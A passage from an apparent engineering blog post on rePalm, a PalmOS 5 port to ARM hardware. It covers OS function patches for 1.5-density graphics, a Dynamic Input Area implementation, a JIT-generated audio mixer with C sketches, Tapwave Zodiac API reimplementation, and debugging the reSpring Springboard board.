calling it if the frame type requested is that special one; the frame drawing function, the one I had already rewritten ( WinDrawRectangleFrame ), then sees that flag and does this one special thing instead. The same had to be done for erasing frame type 0x4004 , and the same method was employed. The results? It worked!

Well rendered PalmOS

There was one more complex case left: drawing a window title. It was buried deep inside FrmDrawForm , since a title is technically a type of a frame object. To intercept this without rewriting the entire function, before it runs, I converted the title object into a special kind of a list object, and saved the original object in my globals. Why a list? FrmDrawForm will call LstDrawList on a list object, and will not peek inside. I then intercept LstDrawList and check for our magic pointer; if it is there, I draw the title, else I let the original LstDrawList function run. On the way out of FrmDrawForm , this is all undone. For the form title setting functions, I just replaced them, since they redraw the title manually, and I had already written a title drawing function. There was one small thing left: the little (i) icon on forms that have help associated with them. It looked bad when tapped. My title drawing function drew it perfectly, but the tap response was handled by FrmHandleEvent - another behemoth I did not want to replace. I looked at it, and saw that the handling of user taps on the help (i) icon happened pretty early on. So I duplicated that logic (and some that preceded it) in my patch for FrmHandleEvent , and did not let the original function get that event. It worked perfectly! Thus we have four more partial patches: LstDrawList , FrmDrawForm , FrmHandleEvent , and CtlDrawControl .

And now, for some polish

Still, one thing was left to do: proper support for the 1.5 density feature set as defined by the SDK. So: I modified the DAL to allow me to patch functions that do not exist in the current OS version at all, since some new ones were added after 5.2 to make this feature set work: WinGetScalingMode and WinSetScalingMode . Then I modified PACE 's 68k dispatch handler for sysTrapHighDensityDispatch to handle the new 68k trap selectors HDSelectorWinSetScalingMode and HDSelectorWinGetScalingMode , letting the rest of the old ones be handled by PACE as they were. I also got a hold of 108ppi fonts, and wrote some code to replace the system fonts with them, and I got a hold of 108ppi system images (like the alert icons) and made my extension put them in the right places.

The result? The system looks pretty good! There are still things left to patch, technically, and "main.c" in the "Fix1.5DD" folder has a comment listing them, but they are all minor and the system looks great as is. The "Fix1.5DD" extension is part of the source code that I am releasing with rePalm, and you can see the comparison "after" screenshot just above to the right. It is about 4000 lines of code, in 77 patches and a bit of glue and install logic.

Dynamic Input Area/Pen Input Manager Services support

DIA/PINS basics

PalmOS initially supported square screens. A few OEMs (HandEra, Sony) did produce non-square screens, but this was not standard. Sony made quite a lot of headway with their 320x480 Sony Clie devices. But their API was Sony-only and was not adopted by others. When PalmOS 5.2 added support for non-square screens, Palm made an API that they called PINS (or alternatively DIA or AIA). It was not as good as Sony's API, but it was official, and thus everyone migrated to it. Later Sony devices were forced to support it too. Why was it worse? Sony's API was simple: collapse the dynamic input area, or bring it back; enable or disable the button to do so. Easy. Palm's API tries to be smart, with things like per-form policies and a whole lot of mess. It also has the simple things: put the area down or up, or enable or disable the button. But all those settings get randomly mutated/erased anytime a new form comes onscreen, which makes it a huge pain! Well, in any case, that is the public API. How does it all work? In PalmOS 5.4, this is all part of the OS proper, and integrated into Boot .

How it works pre-Garnet

But, as I had said, I was targeting PalmOS 5.2. There, it was not a part of the OS; it was an extension. The DAL presents to the system a raw screen of whatever the actual resolution is (commonly 320x480), and the extension hides the bottom area from the apps and draws the dynamic input area on it. This requires intercepting some OS calls, like FrmDrawForm (to apply the new policy), FrmSetActiveForm (to apply policy to re-activated, already-drawn forms), SysHandleEvent (to handle events in the dynamic input area), and UIReset (to reset the settings to defaults on app switching). There are also some things we want to be notified about, like screen color depth changes. When that happens, we may need to redraw the input area. That is the gist of it. There are a lot of small but significant specifics, though.

The intricacies of writing a DIA implementation

Before embarking on writing my own DIA implementation, I tried all the existing ones to see if they would support resolutions other than 320x480. I do not want to write pointless code, after all. None of them worked well. Even such simple things as 160x240 (direct 2x downscaling) were broken. Screens with different aspect ratios, like the common 240x320 and 160x220, were even more broken. Why? I guess nobody ever writes generic code. It is simpler to just hack things up for "now" with no plan for "later". Well, I decided to write a DIA implementation that could support almost any resolution.

When the DIA is collapsed, a status bar is shown. It shows small icons like the home button and menu button, as well as the button to unhide the input area. I tried to make everything as generic as possible. For every possible screen resolution, one can make a skin. A skin is a set of graphics depicting the DIA, as well as some integers describing the areas on it and how they act (what key codes they send, what they do). The specifics are described in the code, comments, and samples (3 skins designed to look similar to Sony's UIs). They also define a "notification tray" area. Any app can add icons there. Even normal 68k apps can! I am including an example of this too. The clock you see in the status bar is actually a 68k app called "NotifGeneral", and its source is provided as part of rePalm's source code! My sample DIA skins currently support 320x480 in double density, 240x320 in 1.5 density, and 160x220 in single density. The cool part? The same codebase supports all of these resolutions despite them having different aspect ratios. NotifGeneral also runs on all of them unmodified. Cool, huh? The source code for the DIA implementation is also published with rePalm, of course!

Audio support

PalmOS Audio basics

Since PalmOS 1.0, there has been support for simple sound via a piezo speaker. That means simple beeps. The official API allows one to: play a MIDI file (one channel, square waves only), play a tone of a given frequency and amplitude (in the background or in the foreground), and stop the tone. In PalmOS 5.0, the low-level API that backs this simple sound API is almost the same as the high-level official API. HALSoundPlay is used to start a tone for a given duration. The tone runs in the background; the function itself returns immediately. If another tone had previously been started, it is replaced with the new one. A negative duration value means that the tone will never auto-stop. HALSoundOff stops a currently-playing tone, if there is one. HALPlaySmf plays a MIDI tune. This one is actually optional. If the DAL returns an error, Boot will interpret the MIDI file itself, and make a series of calls to HALSoundPlay. This means that unless you have special hardware that can play MIDI better than simple one-channel square waves, it makes no sense to implement HALPlaySmf in your DAL.
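
From an app's point of view, the official high-level side of this looks like the following (a minimal sketch using the documented simple sound API):

    #include <PalmOS.h>

    // Play a 440Hz beep for 200ms via the simple sound API.
    static void Beep440(void)
    {
        SndCommandType cmd;

        cmd.cmd    = sndCmdFreqDurationAmp;
        cmd.param1 = 440;            // frequency, Hz
        cmd.param2 = 200;            // duration, ms
        cmd.param3 = sndMaxAmp;      // amplitude
        SndDoCmd(NULL, &cmd, true);  // true = do not block while it plays
    }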

PalmOS sampled audio support

Around the time PalmOS 5.0 came out, the sampled sound API made an appearance. Technically it does not require PalmOS 5.0, but I am not aware of any PalmOS 4 device that implements this API. There were vendor-specific audio APIs in older PalmOS releases, but they were nonstandard and generally depended on custom hardware accelerator chips, since a 68k processor is not really fast enough to decode any complex audio formats. The sampled sound API is obviously more complex than the simple sound API, but it is easily explained with the concept of streams. One can create an input or output stream, set volume and pan for it, and get a callback when data is available (input) or needed (output). For output streams, the system is expected to mix them together. That means that more than one audio stream may play at the same time and they should all be heard. The simple sound API should also work concurrently. PalmOS never really required support for more than one input stream, so at least that is nice.

A stream (in or out) has a few immutable properties. The three most important ones are the sample rate, the channel count, and the sample format. The sample rate is how many samples per second there are. CD audio uses 44,100 per second, most DVDs use 48,000 per second, and cheap voice recorders use 8,000 (approximately telephone quality). PalmOS supports only two channel counts: 1 and 2, commonly known as "mono" and "stereo". The sample format describes how each sample is represented in the data stream. The PalmOS API documents the following sample types: signed and unsigned 8-bit values, signed 16-bit values of either endianness, signed 32-bit values of either endianness, and single-precision floating-point values of either endianness. As far as I can tell, the only formats ever supported by actual devices were the 8 and 16-bit ones.
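
For reference, creating an output stream from an app looks roughly like this; the signatures are from the OS 5 SDK as I remember them, so double-check them against the headers:

    #include <PalmOS.h>

    // Called whenever the system needs more audio: fill `buffer` with
    // `numFrames` frames (a frame = one sample per channel).
    static Err AudioCallback(void *userData, SndStreamRef stream,
                             void *buffer, UInt32 numFrames)
    {
        MemSet(buffer, numFrames * 2 /* channels */ * sizeof(Int16), 0);  // silence
        return errNone;
    }

    static Err StartAudio(SndStreamRef *streamP)
    {
        Err err;

        err = SndStreamCreate(streamP, sndOutput, 44100, sndInt16Little,
                              sndStereo, AudioCallback, NULL,
                              4096 /* buffer bytes */, false /* 68k callback */);
        if (err == errNone)
            err = SndStreamStart(*streamP);
        return err;
    }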

Why audio is hard & how PalmOS makes it easy

Mixing audio is hard. Doing it in good quality is harder, and doing it fast is harder yet. Why? The audio hardware can only output one stream, so you need to mix multiple streams into one. Mixing may involve format conversion, for example if the hardware needs signed 16-bit little-endian samples and one of the streams is in float format. Mixing almost certainly involves scaling, since each stream has a volume and may have a pan applied. And, hardest of all, mixing may involve resampling. If, for example, the hardware runs at 48,000 samples per second, and a client requested to play a stream with 44,100 samples per second, more samples are needed than are provided: for every 147 input samples, 160 output samples must be generated. This is all pretty simple to do if you have large buffers to work with, but that is also a bad idea, since it adds a lot of latency - the larger your buffer, the more time passes between the app providing audio data and the audio coming out the speaker. In the audio world, you are forced to work with relatively small buffers. Users will also notice if you are late delivering audio samples to the hardware (they'll hear it). This means that you are always on a very tight schedule when dealing with audio.

What do existing PalmOS DALs do to address all this difficulty? Mostly, they shamelessly cut corners. All existing DALs have a very bad resampler - it simply duplicates samples as needed to upsample (convert audio to a higher sample rate), and drops samples as needed to downsample (convert audio to a lower sample rate). Why is this bad? When resampling between sample rates that are close to each other in this manner, this method introduces noticeable artifacts. What about format conversions? Well, supporting only four formats is pretty easy - the mixing code was simply duplicated four times in the DAL, once for each format.

How rePalm does audio mixing

I wanted rePalm to produce good audio quality, and I wanted to support all the formats that the PalmOS API claimed were supported. Actually, I ended up supporting even more formats: signed and unsigned 8, 16, and 32-bit integer, as well as single-precision floating-point samples, in either endianness. For sample rates, rePalm's mixer supports 8,000, 11,025, 16,000, 22,050, 24,000, 32,000, 44,100, and 48,000 samples per second. The format the output hardware uses is decided by the hardware driver at runtime in rePalm. Mono and stereo hardware is supported, any sample rate is supported, and any sample format is supported for native hardware output. If you now consider the matrix of all the possible stream input and output formats, sample rates, and channel counts, you'll realize that it is a very large matrix. Clearly the PalmOS approach of duplicating the code 4 times will not work, since we'd have to duplicate it hundreds or thousands of times. The alternative approach of using generic code that switches based on the types is too slow (the switching logic simply wastes too many cycles per sample). No simple solutions here. But before we even get to resampling and mixing, we need to work out how to deal with buffering.

The initial approach involved each channel having a single circular buffer that the client would write and the mixer would read. This turned out to be too difficult to manage in assembly. Why in assembly? We'll get to that soon. The final approach I settled on was actually simpler to manage. Each stream has a few buffers (buffer depth is currently defined to be four), and after any buffer is 100% filled, it is sent to the mixer. If there are no free buffers, the client blocks (as PalmOS expects). If the mixer has no buffers for a stream, the stream does not play, as the PalmOS API specifies. This setup is easy to manage from both sides, since the mixer never has to deal with partially-filled buffers or sort out circular-buffer wraparound criteria. A semaphore is used to conveniently block the client when there are no buffers to fill. "But," you might ask, "what if the client does not give a full buffer's worth of data?" Well, we do not care. Eventually, if the client wants the audio to play, they'll have to give us more samples. And in any case, remember how above we discussed that we have to use small buffers? Any useful audio will be big enough to fill at least a few buffers.
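
A minimal sketch of that buffering scheme, using POSIX semaphores as a stand-in for the DAL's own primitives (names and sizes here are illustrative):

    #include <semaphore.h>
    #include <stdint.h>
    #include <string.h>

    #define BUF_DEPTH  4      // buffer depth, as in rePalm
    #define BUF_BYTES  1024   // illustrative size

    typedef struct {
        uint8_t data[BUF_DEPTH][BUF_BYTES];
        uint32_t fillIdx, fillOfs;   // buffer the client is filling, and how far
        uint32_t drainIdx;           // buffer the mixer is draining
        sem_t freeBufs;              // buffers the client may fill
        sem_t fullBufs;              // buffers ready for the mixer
    } StreamQueue;

    void queue_init(StreamQueue *q)
    {
        memset(q, 0, sizeof(*q));
        sem_init(&q->freeBufs, 0, BUF_DEPTH);
        sem_init(&q->fullBufs, 0, 0);
    }

    // Client side: copy data in, handing each buffer to the mixer only once
    // it is 100% full. Blocks (in sem_wait) when no free buffers remain.
    void client_write(StreamQueue *q, const uint8_t *src, uint32_t len)
    {
        while (len) {
            if (!q->fillOfs)
                sem_wait(&q->freeBufs);              // claim an empty buffer

            uint32_t n = BUF_BYTES - q->fillOfs;
            if (n > len)
                n = len;
            memcpy(&q->data[q->fillIdx][q->fillOfs], src, n);
            q->fillOfs += n;
            src += n;
            len -= n;

            if (q->fillOfs == BUF_BYTES) {           // full: hand it to the mixer
                q->fillOfs = 0;
                q->fillIdx = (q->fillIdx + 1) % BUF_DEPTH;
                sem_post(&q->fullBufs);
            }
        }
    }

    // Mixer side: grab a full buffer, or NULL if none is ready (in which
    // case the stream simply does not play this round).
    uint8_t *mixer_claim(StreamQueue *q)
    {
        if (sem_trywait(&q->fullBufs))
            return NULL;
        return q->data[q->drainIdx];
    }

    // Mixer side: when done with a buffer, release it back to the client.
    void mixer_release(StreamQueue *q)
    {
        q->drainIdx = (q->drainIdx + 1) % BUF_DEPTH;
        sem_post(&q->freeBufs);
    }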

One mustn't forget that supporting the sampled sound API does not absolve you from having to support the simple sound functions. rePalm creates a sound stream for simple sound support, and uses it to play the required tones. They are generated from an interpolated sine wave at request time. To support doing this without any pesky callbacks, the mixer supports special "looped" channels. This means that once the data buffer is filled, it is played repeatedly until stopped. Since at least one complete wave must fit into the buffer, rePalm refuses to play any tones under 20Hz. This is acceptable to me.

How do assembly and audio mix?

The problem of resampling, mixing, and format conversion loomed large over me. The naive approach of taking a sample from each stream, mixing it into the output stream, and then doing the same for the next stream is too slow, due to the constant "switch"ing required based on sample types and sample rates. Resampling is also complex if done in good (or at least passable) quality. So what does rePalm's DAL do? For resampling, a large number of tables are used. For upsampling, a table tells us how to linearly interpolate between input samples to produce output samples. One such carefully-tuned table exists for each pair of frequencies. For downsampling, a table tells us how many samples to average and at what weight. One such table exists for each pair of frequencies. Both of these approaches are strictly better than what PalmOS does. But, if mixing was already hard, now we just made it harder. Let's try to split it into chewable chunks. First, we need an intermediate format - a format we can work with efficiently and quickly, without serious data loss. I picked signed 32-bit fixed point with 8 integer bits and 24 fraction bits. Since no PalmOS device ever produced audio at more than 24-bit resolution, this is acceptable. The flow is conceptually simple: first zero-fill an intermediate buffer. Then, for each stream for which we have buffers of data, mix said buffer(s) into the intermediate buffer, with resampling as needed. Then clip the intermediate buffer's samples, since mixing two loud streams can produce values over the maximum allowed. And, finally, convert the intermediate buffer into the format the hardware supports, and hand it off to the hardware. rePalm does not bother with a stereo intermediate buffer if the audio hardware is mono-only. The intermediate buffer is only in stereo if the hardware is! How do we get this much flexibility? Because of how we mix things into it.
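
To make the 8.24 format concrete, here is a minimal sketch of the clip-and-convert step for signed 16-bit hardware (my own illustration of the arithmetic, not the rePalm code):

    #include <stdint.h>

    // In 8.24 fixed point, full-scale audio is +/- 1.0, i.e. +/- (1 << 24).
    #define FS_POS  ((1 << 24) - 1)
    #define FS_NEG  (-(1 << 24))

    // Clip one 8.24 intermediate sample and convert it to signed 16-bit.
    // Shifting right by 9 maps +/- 2^24 onto +/- 2^15.
    static inline int16_t clip_to_s16(int32_t s)
    {
        if (s > FS_POS)
            s = FS_POS;
        else if (s < FS_NEG)
            s = FS_NEG;
        return (int16_t)(s >> 9);
    }

    // Convert a whole intermediate buffer for the hardware.
    void convert_buffer(const int32_t *mix, int16_t *hw, uint32_t n)
    {
        while (n--)
            *hw++ = clip_to_s16(*mix++);
    }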

The only hard part from the above is that "mix buffers into the intermediate buffer with resampling" step. In fact, not only do we need to resample, but we also need to apply volume and pan, and possibly convert from mono to stereo or from stereo to mono. The fastest approach is to write a custom, well-tuned mix function for every possible combination of inputs and outputs. The number of combinations is dizzying. Input has 8 possible rates, 2 possible channel configs, and 12 possible sample types. Output has 8 possible rates and 2 possible channel configs. This means that there is a total of just over 3,000 combinations (8 x 2 x 12 x 8 x 2 = 3,072). I was not going to write 3,072 functions by hand. In fact, even auto-generating them at build time (if I were to somehow do that) would bloat rePalm's DAL's code size to megabytes. No, another approach was needed.

I decided that I could reuse some things I learned while writing the JIT, and also reuse some of its code. That's right! When you create a stream, a custom mix function is created just for that stream's configuration and for your hardware's output configuration. This custom assembly code uses all the registers optimally and, in fact, manages to use no stack at all! The benefit is clear: the mixing code is always optimal, since it is custom-made for your configuration. For example, if the hardware only supports mono output, the mixing code will downmix before upsampling (to do it on fewer samples), but will only downmix after downsampling (once again, so less math is needed). Since there are three major cases - upsampling, downsampling, and no resampling - there are three paths through the codegen to produce mix functions. Each mix function matches a very simple prototype: int32_t* (*MixInF)(int32_t* dst, const void** srcP, uint32_t maxOutSamples, void* resampleStateP, uint32_t volumeL, uint32_t volumeR, uint32_t numInSamples). It returns the pointer to the first intermediate buffer sample NOT written. srcP is updated to point to the first input audio sample not consumed, maxOutSamples limits how many audio samples may be produced, and numInSamples limits how many audio samples may be consumed. Mix functions return when either limit is reached. Resampling logic may have long-lived state, so that is stored in a per-stream data structure (5 words) and passed in as resampleStateP. The actual resample table pointer is encoded in the function itself (for speed), since it will never change. Why? Because the stream's sample rate is constant, and the hardware will not magically grow the ability to play at another sample rate at a later time. The stream's volume and pan, however, may be changed at any time, so they are not hardcoded into the function body; they are provided as parameters at mixing time. I actually considered hardcoding them in, and re-generating the mix function anytime the volume or pan changed, but the gain would have been too small to matter, so I decided against it. Instead we simply pre-calculate "left volume" and "right volume" from the user settings of "volume" and "pan" and pass them to the mix function.
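
That precalculation might look something like this - a sketch with a simple linear pan law and hypothetical ranges (the real PalmOS ranges and rePalm's exact law may differ):

    #include <stdint.h>

    // Hypothetical ranges: volume 0..1024 (unity = 1024), pan -1024..+1024
    // (negative = left). Outputs are fixed-point gains with unity = 1024.
    static void calc_channel_volumes(int32_t volume, int32_t pan,
                                     uint32_t *volumeL, uint32_t *volumeR)
    {
        // A simple linear pan law: panning right attenuates the left channel.
        int32_t gainL = (pan > 0) ? (1024 - pan) : 1024;
        int32_t gainR = (pan < 0) ? (1024 + pan) : 1024;

        *volumeL = (uint32_t)((volume * gainL) >> 10);
        *volumeR = (uint32_t)((volume * gainR) >> 10);
    }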

Having a mix function that nice makes the rest of the mixer easy. Simply call the mix function for each non-paused stream, as long as there are buffers to consume and the output buffer is not full. If we fully consume a buffer, release it to the user. If not, just remember how many samples of it we haven't yet used for later. That is all! So does all this over-complex machinery work? Yes it does! The audio mixer is about 1,500 lines, BUT it can resample and mix streams in realtime at under 3 million cycles per stream per second, which is much better than PalmOS did, and with better quality to boot! The code is in "audio.c".
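
In pseudo-C, that per-wakeup loop looks roughly like this - a sketch built around the MixInF prototype above; all the stream bookkeeping field names and helpers are made up:

    // Illustrative pseudo-C only.
    typedef int32_t* (*MixInF)(int32_t *dst, const void **srcP,
                               uint32_t maxOutSamples, void *resampleStateP,
                               uint32_t volumeL, uint32_t volumeR,
                               uint32_t numInSamples);

    void mix_all_streams(struct Stream *streams, int32_t *intermediate,
                         uint32_t outSamples)
    {
        for (struct Stream *s = streams; s; s = s->next) {
            if (s->paused)
                continue;

            int32_t *dst = intermediate;                 // every stream ADDS into
            int32_t *end = intermediate + outSamples;    // the same buffer

            while (dst < end && stream_has_full_buffer(s)) {
                const void *src = stream_cur_data(s);    // skips consumed samples

                // The generated code resamples, applies volumeL/volumeR, and
                // mixes into dst; src is advanced past the consumed input.
                dst = s->mixF(dst, &src, (uint32_t)(end - dst),
                              s->resampleState, s->volumeL, s->volumeR,
                              s->bufSamples - s->consumed);

                s->consumed = stream_samples_consumed(s, src);
                if (s->consumed == s->bufSamples) {      // whole buffer used up:
                    stream_release_buffer(s);            // give it back to the client
                    s->consumed = 0;
                }
            }
        }
    }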

rePalm's audio hw driver architecture

rePalm's audio hardware layer is very simple. For simple sound support, one just provides the functions for that, and the sound layer calls them directly. For sampled audio, the audio init function tells the audio mixer the native channel count and sample rate. What about the native sample format? The code provides an inline function to convert a sample from the mixer's intermediate format (8.24 signed integer) to whatever format the hardware needs. Thus, the hardware's native sample format is defined by this inline function. At init time, the hardware layer provides all this info to the mixer, as well as the size of the hardware audio buffer. This buffer is needed since interrupts have latency, and we need the audio hardware to always have some audio to play.

On the STM32F429 board, audio output is on pin A5. The audio is generated using a PWM channel running at 48,000 samples per second, in mono mode. Since the PWM clock runs at 192MHz, if we want to output 48,000 samples per second, the PWM unit will only be able to count to 4,000 (192,000,000 / 48,000). Yes, indeed, for this board, since it lacks any real audio output hardware, we're stuck with just about 12 bits of precision. This is good enough for testing purposes and actually doesn't sound all that bad. The single-ended output directly from the pin of the microcontroller cannot provide much power, but with a small speaker, the sound is clear and sounds surprisingly good! I will upload an image with audio support soon.

On reSpring, the CPU clock (and thus the PWM clock) is 196.6MHz. Why this weird frequency? Because it is precisely 48,000 x 4096. This allows us to avoid scaling audio in a complex fashion, like we do on the STM32F429 board; just saturating it to 12 bits will work. Also, on reSpring, two pins are used to output audio in opposite polarities. This gives us twice the voltage swing, producing louder sound.

Microphone

I did not implement a mixer/resampler for the microphone. PalmOS never supported more than one user of the microphone at a time, so no apps will try to share it - why bother? Instead, whichever sampling rate is requested, I pass that to the hardware driver and have it actually run at that sampling rate. As for the sample type, same as for audio out: a custom function is generated to convert the sample format from the input (16-bit little-endian mono) to whatever the requested format was. The generated code is pretty tight and works well!

Zodiac support

Tapwave Zodiac primer

The Tapwave Zodiac was a rather unusual PalmOS device released in 2003. It was designed for gaming and had some special hardware just for that: a landscape screen, an analog stick, a Yamaha MIDI chip, and an ATI Imageon W4200 graphics accelerator with dedicated graphics RAM. There were a number of Tapwave-exclusive titles released that used the new hardware well, including some fancy 3D games. Of course, this new hardware needed OS support. Tapwave introduced a number of new APIs and, luckily, documented them quite well. The new API was well designed and easy to follow. The documentation was almost perfect. Kudos, Tapwave! Of course, I wanted to support Tapwave games in rePalm.

The reverse engineering

Tapwave's custom APIs were all exposed via a giant table of function pointers given to all Tapwave-targeting apps after they pass the signature checks (Tapwave required approvals and app signing). But, of course, somewhere they had to go to some library or hardware. Digging in, it became clear that most of them go to the Tapwave Application Layer (TAL). This module is special in that, on the Zodiac, like the DAL, Boot, and UI, the TAL can be accessed directly off of R9 via LDR R12, [R9, #-16]; LDR PC, [R12, #4 * tal_func_no]. But, after spending a lot of time in the TAL, I realized that it was just a wrapper. All the other libraries were too: the Tapwave Midi Library and the Tapwave Multiplayer Library. All the special sauce was in the DAL. And, boy, was there a lot of special sauce. Normal PalmOS DALs have about 230 entrypoints. Tapwave's has 373!

A lot of tracing through the TAL, and a lot of trawling through the CPU docs, got me the names and params of most of the extra exported DAL funcs. I was able to deduce what all but 14 functions do! And as for those 14: I could find no uses of any of them anywhere in the device's software! The actual implementations underneath matter a bit less, since I am just reimplementing them. My biggest worries were, of course, the graphics acceleration APIs. Turns out that part was the easiest!

The "GPU"

The Zodiac's graphics accelerator was pretty fancy for a handheld device at the time, but by modern standards it is quite basic. It has 8MB of memory built in, and accelerates only 2D operations. Basically, it can: copy rectangles of image data, blend rectangles between layers with constant or parametric alpha blending, do basic bilinear resizing, and draw lines, rectangles, and points. It operates only on 16-bit RGB565LE layers. This was actually quite easy to implement. Of course, doing this in software would not be fast, but for the purposes of my proof of concept, it was good enough. A few days of work, and... it works! A few games ran.
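
As a flavor of what "implementing it in software" means, here is a minimal sketch of the simplest of those operations, a rectangle copy between RGB565 layers (my illustration, not the rePalm code):

    #include <stdint.h>
    #include <string.h>

    // Copy a w x h rectangle between two RGB565 layers.
    // Strides are in pixels; the rectangles must not overlap.
    void blit_rect(uint16_t *dst, uint32_t dstStride, uint32_t dstX, uint32_t dstY,
                   const uint16_t *src, uint32_t srcStride, uint32_t srcX, uint32_t srcY,
                   uint32_t w, uint32_t h)
    {
        dst += dstY * dstStride + dstX;
        src += srcY * srcStride + srcX;

        while (h--) {
            memcpy(dst, src, w * sizeof(uint16_t));
            dst += dstStride;
            src += srcStride;
        }
    }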

The next step is still in progress: using the DMA2D unit in the STM32 to accelerate most of the things the ATI chip can do. Except for image resizing, it can do them all in one pass or two! For extra credit, it can also operate in the background, like the ATI chip did relative to the CPU in the Zodiac. But that is for later...

Other Tapwave APIs

The input subsystem in the Zodiac was quite special and required some work. Instead of the usual PalmOS methods of reading keys, touch, etc., Tapwave introduced a new "input queue" mechanism that allowed all of these events to be delivered into one place. I had to reimplement this from nothing but the documented high-level API and disassembly. It worked: rePalm now has a working implementation of TwInput, and it can be used as a reference for anyone who also, for some reason, wants to implement it.

TwMidi was mostly reverse engineered in a week, but I did not write a MIDI sequencer. I could, and shall, but not yet. The API is known, and that is as far as I needed to go to return proper error codes and allow the rest of the system to go on.

Real hardware: reSpring

The ultimate Springboard accessory

Back when Handspring first released the Visor, its Springboard Expansion Slot was one of its most revolutionary features. It allowed a few very cool expansion devices, like cellular phones, GPS receivers, barcode readers, expansion card readers, and cameras. The Springboard slot is cool because it is a literal direct connection to the CPU's data and address bus. This provides a lot of expansion opportunities. I decided that the first application of rePalm should be a Springboard accessory that will, when plugged in, upgrade a Visor to PalmOS 5. The idea is that reSpring will run rePalm on its own CPU, and the Visor will act as the screen, touch, and buttons. I collaborated with George Rudolf Mezzomo on reSpring, with me setting the specs, him doing the schematics and layout, and me doing the software and drivers.

Interfacing with the Visor

To the Visor, a Springboard module looks like two memory areas (two chip select lines), each a few megabytes large at most. The first must have a valid ROM image for the Visor to find, structured like a PalmOS ROM, with a single heap. Usually that heap contains a single application: the driver for the module. The second chip select is usually used to interface to whatever hardware the Springboard unit has. For reSpring, I decided to do things differently. There were a few reasons. The main reason was that a NOR flash to store the ROM would take up board space, but also I really did not want to manage so many different flashable components on the board. There was a third reason too, but we'll get back to that in a bit.

The Visor expects to interface with the Springboard by doing memory accesses to it (reads and writes), and the module is expected to basically behave like a synchronous memory device. That means that there is no "I am ready to reply" line; instead, you have a fixed number of cycles to reply to any request. When a module is inserted, the Visor configures that number to be six, but it can then be lowered by the module's driver app. Trying to reply to requests coming in with a fixed (and very short) deadline would be a huge CPU load for our ARM CPU. I decided that the easiest way to accomplish this was to actually put a RAM there, and let the Visor access that. But, then, how will we access it, if the Visor can do so at any time? Well, there are special types of RAM that allow this.

Yes, the elusive (and expensive) dual-ported RAM. I decided that reSpring would use a small amount of dual-ported RAM as a mailbox between the Visor and rePalm's CPU. This way the Visor could access it anytime, and so could rePalm. The Springboard slot also has two interrupt request lines, one to the Visor, one to the module. These can be used to signal when a message is in the mailbox. There are two problems. The first is that dual-ported RAMs are usually physically large, mostly due to the large number of pins needed. Since the Visor needs a 16-bit-wide memory in the Springboard slot, our hypothetical dual-ported RAM would need to be 16 bits wide. And then we need address lines, control lines, byte lane select lines, and chip select lines. If we were to use a 4KB memory, for example, we'd need 11 address lines, 16 data lines, 2 byte lane select lines, one chip select line, one output enable line, and one write enable line, PER PORT! Add in at least two power pins, and our hypothetical chip is a 66-pin monstrosity. Since 66-pin packages do not exist, we're in for a 100-pin part. And 4KB is not even much. Ideally we'd like to fit our entire framebuffer in there to avoid complex piecewise transfers. Sadly, as the great philosopher Jagger once said, "You can't always get what you want." Dual-ported RAMs are very expensive. There are only two companies making them, and they charge a lot. I settled on the 4KB part purely based on cost. Even at this measly 4KB size, this one RAM is by far the most expensive component on the board at $25. Given that the costs of putting in a 64KB part (my preferred size) were beyond my imagination (and beyond my wallet's abilities), I decided to invent a complex messaging protocol and make it work over a 4KB RAM used as a bidirectional mailbox.

But let us get back to our need for a ROM to hold our driver program. Nowhere in the Springboard spec is there actually a requirement for a ROM, just a memory. So what does that mean? We can avoid that extra chip by having the reSpring CPU contain the ROM image inside it, and quickly write it into the dual-ported RAM on powerup. Since the Visor gives the module up to three seconds to produce a valid card header, we have plenty of time to boot up and write the ROM to our RAM. One chip fewer to buy and place on the board is wonderful!

Version 1

I admit: there was a bit of feature creep, but the final hardware design for version 1 ended up being: 8MB of RAM, 128MB of NAND flash, a 192MHz CPU with 2MB of flash for the OS, a microSD card slot, a speaker for audio out, and an amplifier to use the in-Visor microphone for audio in. Audio out will be done the same way as on the STM32F429 board; audio in will be done via the real ADC. The main RAM is on a 32-bit-wide bus running at 96MHz (384MB/s of bandwidth). The NAND flash is on a QSPI bus at 96MHz (48MB/s of bandwidth). The OS will be stored in the internal flash of the STM32F469 CPU. The onboard NAND is just an exploration I would like to do. It will either be an internal SD card, or maybe storage for something like NVFS (but not as unstable), when I've had time to write it.

So, when is this happening? Five version 1 boards were delivered to me in late November 2019!

Bringup of v1

Having hardware in hand is great. It is greater yet when it works right the very first time. Great like unicorns, and just as likely. Nope... nothing worked right away. The boards did not want to talk to the debugger at all, and after weeks of torture, I realized some pull-ups and pull-downs were missing from the boards. This was not an issue on ST's dev boards, since they include these pull-ups/downs. Once the CPU started talking to me, it became evident very quickly that it was very, very unstable. It is specified to run at 180MHz (yes, this means that normally we are overclocking it by 9.2% to 196.6MHz). On the reSpring boards, the CPU would not run with any stability over 140MHz. I checked the power supply and the decoupling caps. All seemed to be in place, until... no VCAP1 and VCAP2. The CPU core runs at a lower voltage than 3.3V, so the CPU has an internal regulator. This regulator needs capacitors to stabilize its output in the face of variable consumption by the CPU. That is what the VCAP1 and VCAP2 pins are for. Well, the board had no capacitors on VCAP1 and VCAP2. The internal regulator output was swinging wildly (+/- 600mV on a 1.8V supply is a lot of swing!). In fact, it is amazing that the CPU ran at all with such an unstable supply! After another rework under the microscope, in which two capacitors were added, the board was stable. On to the next problem...

The next issue was the SDRAM - the main place code runs from and data is stored. The interface seemed entirely borked. In any word that was written, bit 15 would always read back as one, and bits 0 and 1 would always read back as zero. Needless to say, this is not acceptable for a RAM which I hoped to run code from. This was a giant pain to debug, but in the end it turned out to be a typo in the GPIO config, which did not map the two lower bits to SDRAM DQ0 and DQ1. This left only bit 15 stuck high to resolve. That issue did not replicate on other boards, so it was local to one board. A lot of careful microscoping revealed a gob of solder under the pin, left over from PCBA, which was shorting it to a nearby pin that was high. Lifting the pin, wicking the solder off, and reconnecting the pin to the PCB resolved this issue. SDRAM now worked. Since this SDRAM was quite different from the one on the STM32F429 Discovery board, I had to dig up the configs to use for it, and translate between the timings ST uses and the ones the RAM datasheet uses to come up with proper settings. The result was quite fast SDRAM which seems stable. Awesome!

Of course, this was not nearly the end of it. I could not access the dual-ported SRAM at all. A quick check against the board layout revealed that its chip select pin was not wired to the STM at all. Out came the microscope and soldering iron, and a wire was added. Lo and behold, the SRAM was accessible. More datasheet reading ensued to configure it properly. While doing that, I noticed that its power consumption is listed as "low": just 380mW!!! So not only is this the most expensive chip on the board, it is also the most power-hungry! It really needs to go!

